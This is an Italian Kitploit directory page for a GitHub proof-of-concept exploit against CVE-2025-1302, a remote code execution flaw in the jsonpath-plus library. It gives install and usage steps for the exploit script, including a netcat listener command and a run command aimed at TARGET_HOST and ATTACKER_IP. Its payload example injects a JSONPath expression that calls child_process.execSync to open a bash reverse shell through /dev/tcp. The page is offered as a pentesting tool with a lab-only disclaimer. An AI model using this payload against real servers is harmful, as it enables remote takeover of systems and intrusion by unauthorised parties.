Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — Exploit PoC e demo del server vulnerabile per CVE-2025-1302 in jsonpath-plus. | Kitploit
Strumenti/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

Exploit PoC e demo del server vulnerabile per CVE-2025-1302 in jsonpath-plus.

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-1302 JSONPath-Plus RCE PoC

Nome dello script PoC: poc.py

Uno script exploit proof-of-concept per CVE-2025-1302, che mira a una vulnerabilità RCE nella libreria jsonpath-plus. Quando viene eseguito contro un endpoint di servizio vulnerabile, lo script tenta di innescare l'esecuzione remota di codice tramite un payload JSONPath e di stabilire una reverse shell verso l'attaccante.


Caratteristiche

  • Metodi HTTP flessibili: supporta POST, GET o AUTO (POST con fallback a GET) tramite le opzioni --method o --no-fallback.
  • Payload personalizzati: carica uno o più template di payload RCE JSONPath da un file, con segnaposto {ip} e {port}.
  • Payload predefinito integrato: se non viene fornito alcun file di payload, usa un template completo di reverse shell bash.
  • Debug dettagliato: stampa i body completi di richieste/risposte per i tentativi POST e GET quando falliscono.
  • Indicatori di avanzamento: mostra i cicli di attesa e di payload con barre di avanzamento tqdm.
  • Registrazione: salva opzionalmente tutti i risultati in un file JSON con --output.
  • Installazione

    1. Clona questo repository:

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. Installa le dipendenze (richiede Python 3.6+):

      root@kitploit:~
      pip install -r requirements.txt
      

    Utilizzo

    1. Avvia un listener sulla tua macchina di attacco (sostituisci la porta se necessario):

      root@kitploit:~
      nc -lvnp 9999
      
    2. Esegui il PoC:

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file: File contenente un payload JSONPath per riga. Usa i segnaposto {ip} e {port}.
    • --delay: Secondi di attesa prima di inviare i payload (mostra un conto alla rovescia).
    • --method: Forza POST, GET o AUTO (default).
    • --no-fallback: Scorciatoia per saltare qualsiasi nuovo tentativo GET (equivalente a --method POST).
    • --output: Percorso in cui salvare il log JSON dei tentativi.

    Esempio di file di payload

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    Contributi

    1. Fai il fork del repository e crea un branch per la funzionalità.
    2. Invia una pull request con le tue modifiche.

    Esclusione di responsabilità

    Usa questo script solo in ambienti di laboratorio controllati e su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. L'abuso può essere illegale e non etico.

    Scarica lo strumento